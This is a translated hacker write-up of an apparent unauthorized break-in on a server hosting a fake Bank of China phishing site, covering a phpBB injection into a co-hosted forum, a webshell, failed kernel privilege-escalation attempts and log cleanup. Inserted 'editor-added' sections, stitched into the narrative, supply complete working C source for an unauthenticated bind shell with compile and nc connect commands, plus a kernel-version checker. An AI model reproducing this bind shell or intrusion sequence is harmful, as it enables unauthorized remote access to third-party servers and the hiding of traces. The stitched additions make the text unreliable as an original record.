A Failed Intrusion I Hadn't Planned to Write Up
I hadn't meant to write this one up, but a few friends wanted to see it, and since it only circulates internally there is nothing in it that can't be shown. So here it is; beginners can learn something from it, and I want to learn more myself.
On the evening of the 27th I saw a report from tianyao: "The Bank of China website has once again been cloned by a fake site in North America". The report was reprinted from:
http://www.coolersky.com/web/news/20050228014041.asp
I had to take a look. Now that it has come up, let's check it out. No more talk, let's start!
1. Collect information
Server information:
Apache/1.3.33
PHP/4.3.9
Main page of the fake site:
http://www.banochi.net/english/index.shtml
Looking at the fake site itself, there is basically nothing to work with; it probably contains only a CGI program that records the submitted passwords and IP addresses. Apart from that, getting in through another site hosted on the same server is also an option.
I searched for other sites on the server and analyzed injection in several PHP sites, but they were not much use. Then I remembered the phpBB hole, wrote a small script to search for viewtopic.php files, and found a phpBB 2.0.10 installation to use as the entry point:
http://www.bits-clsu.org/forum/viewtopic.php?t=1
Afterwards I remembered that a same-server (side-site) lookup tool could have searched for this directly. Either way, the result is the same.
2. Upload the trojan
Using the phpBB hole (see the write-ups "phpBB Remote Arbitrary SQL Injection Vulnerability" and "phpBB SQL Injection Vulnerability Analysis"), upload a PHP webshell.
3. Generate a bindshell
While I was still reading through the files, Edward had already set up a bindshell! The basic method:
Upload bindshell.c
gcc -o /tmp/bind bindshell.c
/tmp/bind
Then connect with nc; working in a real shell is much more convenient than in the webshell:
nc -vv 216.22.48.72 7758
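For readers who have not seen one, here is a minimal TCP bind shell of the kind the step above compiles and runs. This is an editor-added example, not the bindshell.c the author uploaded; it assumes the default port 7758 from the nc command and that /bin/sh exists on the target. It listens on every interface, accepts a single client, wires that socket to a shell's stdin/stdout/stderr and execs sh.

```c
/* Minimal TCP bind shell, added as an illustration of the
 * "upload bindshell.c, gcc -o /tmp/bind bindshell.c, /tmp/bind" step.
 * Editor-added example code, not the bindshell.c used in the write-up.
 * Port 7758 is taken from the nc command in the text. */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#define DEFAULT_PORT 7758

/* Parse a decimal TCP port from a string; returns -1 if it is not 1..65535. */
int parse_port(const char *s)
{
    char *end;
    long v;
    if (s == NULL || *s == '\0') return -1;
    v = strtol(s, &end, 10);
    if (*end != '\0' || v < 1 || v > 65535) return -1;
    return (int)v;
}

/* Create a listening socket on 0.0.0.0:port. Returns the fd or -1.
 * *bound_port receives the port actually bound (useful when port == 0). */
int make_listener(int port, int *bound_port)
{
    int fd, one = 1;
    struct sockaddr_in sa;
    socklen_t len = sizeof sa;

    fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) return -1;
    /* SO_REUSEADDR so a restart does not fail on a lingering TIME_WAIT socket */
    setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &one, sizeof one);

    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_ANY);
    sa.sin_port = htons((unsigned short)port);
    if (bind(fd, (struct sockaddr *)&sa, sizeof sa) < 0 || listen(fd, 1) < 0) {
        close(fd);
        return -1;
    }
    if (bound_port != NULL && getsockname(fd, (struct sockaddr *)&sa, &len) == 0)
        *bound_port = ntohs(sa.sin_port);
    return fd;
}

/* Accept one client and hand it an interactive /bin/sh: the shell's stdin,
 * stdout and stderr all become the client socket. Does not return on success. */
void serve_shell(int lfd)
{
    int cfd = accept(lfd, NULL, NULL);
    if (cfd < 0) return;
    dup2(cfd, 0);
    dup2(cfd, 1);
    dup2(cfd, 2);
    close(lfd);
    execl("/bin/sh", "sh", "-i", (char *)NULL);
    _exit(1); /* only reached if execl fails */
}

int main(int argc, char **argv)
{
    int port = (argc > 1) ? parse_port(argv[1]) : DEFAULT_PORT;
    int lfd;
    if (port < 0) { fprintf(stderr, "bad port\n"); return 1; }
    lfd = make_listener(port, NULL);
    if (lfd < 0) { perror("listen"); return 1; }
    /* No authentication: anyone who can reach the port gets the shell. */
    serve_shell(lfd);
    return 1;
}
```

Compile and run it exactly as in the step above (gcc -o /tmp/bind bindshell.c; /tmp/bind), then connect with nc -vv host 7758. Two caveats a practitioner should keep in mind: the listener has no authentication, so anyone who can reach the port owns the shell, and it is plainly visible in netstat -ltnp, which is one reason the "clean up the exploits" step later in this write-up matters. If gcc fails with "collect2: cannot find 'ld'", see the PATH fix in section 5.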
4. Collect system information
After obtaining the webshell you can gather some basic information, including passwd and httpd.conf, and find the absolute path of the fake site: /home/banochin/public_html/. Viewing file timestamps in the webshell, its cgi-bin directory contains the following files:
File            Created   Modified  Size        Mode
[member]        21:39:03  21:39:03              0700
errlog.dat      00:32:22  00:32:22  140.186 kb  0600
id.dat          10:48:35  10:48:35  1.727 kb    0600
index.htm       03:19:51  03:19:51  0.697 kb    0644
pwd.dat         00:36:15  00:36:15  0.170 kb    0600
pwdbak.dat      03:24:17  03:19:55  0.516 kb    0600
security.cgi    03:24:03  03:20:00  44.363 kb   0700
visemailer.cgi  03:24:04  03:20:02  3.554 kb    0700
You can see that the password files are dated February 22 and 25. Browsing the directory, I found that Bank of China pages in many other languages are also there, but they are basically plain HTML files, so they must have been dumped straight from the Bank of China site with a web dumper.
Kernel information. Since we have no write permission on its directories, the next step is to escalate privileges. Everything up to this point took about an hour; privilege escalation took me more than a day and still did not succeed, which was depressing!
uname -r
2.4.20-021stab022.11.777-enterprise
5. Local privilege escalation tests
First add /usr/bin to the environment:
export PATH=/usr/bin:$PATH
Otherwise gcc fails with "collect2: cannot find 'ld'"!
(1) Linux kernel moxa serial driver BSS overflow vulnerability
From "grsecurity 2.1.0 release / 5 Linux kernel advisories"
URL: http://marc.theaimsgroup.com/?l=full-disclosure&m=110374209001676&w=2
Test:
gcc -o vc_resize vc_resize.c
./vc_resize
------------------------------------------------------------------------
open: No such device or address
------------------------------------------------------------------------
gcc memory_leak.c -o memory_leak
------------------------------------------------------------------------
memory_leak.c:80:2: warning: no newline at end of file
------------------------------------------------------------------------
(4) Linux kernel do_mremap VMA limit local privilege escalation vulnerability
Linux Kernel do_mremap VMA Limit Local Privilege Escalation
URL: http://marc.theaimsgroup.com/?l=bugtraq&m=110554694522719&w=2
Test:
gcc -o smp smp.c
./smp
------------------------------------------------------------------------
[+] In thread 1 (pid = 5400)
[+] In thread 2 (pid = 5401)
[+] rdtsc calibration: 53428
[+] Exploiting race, wait...
[-] Unable to exploit race in 30 s,
kernel patched or load too high.
------------------------------------------------------------------------
Several local privilege escalation attempts all failed. Very depressing! While I was testing, the fake site was taken down; although the files are still there, the official team has clearly put in a lot of effort and got a good result.
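The "kernel patched or load too high" verdict above is worth a closer look. The target's uname string is not a stock 2.4.20; it carries a vendor build suffix, and vendor kernels routinely backport fixes without bumping the upstream number, so comparing "2.4.20" against an advisory's fixed version says little. The following editor-added C example (not code from the write-up) parses a uname -r string and refuses to call the kernel "vulnerable" on version number alone when a vendor suffix is present. The version string is the one quoted above; the fixed-in version "2.4.29" passed in main() is a placeholder assumption for illustration, not a fact taken from this page.

```c
/* Editor-added example: parse a "uname -r" string of the form
 * MAJOR.MINOR.PATCH[-extra] and decide whether the upstream number alone
 * can tell us anything. The version string in main() is the one quoted in
 * the write-up; the fixed-in version is a placeholder assumption. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct kver {
    int major, minor, patch;
    char extra[64]; /* vendor build suffix after the first '-' ("" if none) */
};

/* Returns 1 on success, 0 if the string does not start with a.b.c */
int parse_kver(const char *s, struct kver *k)
{
    char *end;
    memset(k, 0, sizeof *k);
    k->major = (int)strtol(s, &end, 10);
    if (end == s || *end != '.') return 0;
    s = end + 1;
    k->minor = (int)strtol(s, &end, 10);
    if (end == s || *end != '.') return 0;
    s = end + 1;
    k->patch = (int)strtol(s, &end, 10);
    if (end == s) return 0;
    if (*end == '-') end++;
    strncpy(k->extra, end, sizeof k->extra - 1);
    return 1;
}

/* Three-way compare of the numeric part only */
int kver_cmp(const struct kver *a, const struct kver *b)
{
    if (a->major != b->major) return a->major < b->major ? -1 : 1;
    if (a->minor != b->minor) return a->minor < b->minor ? -1 : 1;
    if (a->patch != b->patch) return a->patch < b->patch ? -1 : 1;
    return 0;
}

/* A vendor build suffix means backported fixes may be present without a
 * version bump, so the upstream number is not evidence either way. */
int has_vendor_suffix(const struct kver *k)
{
    return k->extra[0] != '\0';
}

/* 1 = numeric version below fixed_in and no vendor suffix (likely vulnerable),
 * 0 = at or after fixed_in, -1 = cannot tell from the version string. */
int likely_vulnerable(const char *uname_r, const char *fixed_in)
{
    struct kver k, f;
    if (!parse_kver(uname_r, &k) || !parse_kver(fixed_in, &f)) return -1;
    if (kver_cmp(&k, &f) >= 0) return 0;
    return has_vendor_suffix(&k) ? -1 : 1;
}

int main(void)
{
    /* "2.4.29" is an assumed fixed-in version for illustration only. */
    const char *target = "2.4.20-021stab022.11.777-enterprise";
    int v = likely_vulnerable(target, "2.4.29");
    printf("%s -> %s\n", target,
           v == 1 ? "likely vulnerable"
         : v == 0 ? "at or after the fixed version"
                  : "vendor kernel: version number alone is inconclusive");
    return 0;
}
```

In practice this means the exploit's own "kernel patched or load too high" message is the better indicator than the version number, and that a failed run on a vendor kernel is not a reason to keep retrying the same public exploit.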
6. Others
I found a few Linux sniffers, but they require root. And since the server is presumably only accessed remotely over SSH, a sniffer would be useless anyway. With no further ideas for now, I cleaned up the exploits and the log files.
The above are some of my test results. Root was not obtained, but I have sorted out the relevant vulnerabilities for future use. I posted the results in the webmaster group and nobody replied; I don't know whether everyone is just too busy...
This article does not go into the vulnerabilities or the results in any special depth. If you are interested you can use them directly, but there is no need to go and embarrass other sites; I hope you understand what I mean!
After all this there is still a lot of work to do! Hopefully the boss won't have anything to say about it, heh.
Finally, thanks to Edward, la, and several of our colleagues!
This article may be reproduced freely, but please credit the source. In particular, neither the whole nor any part of this article may be used for any commercial or paid purpose. Thank you!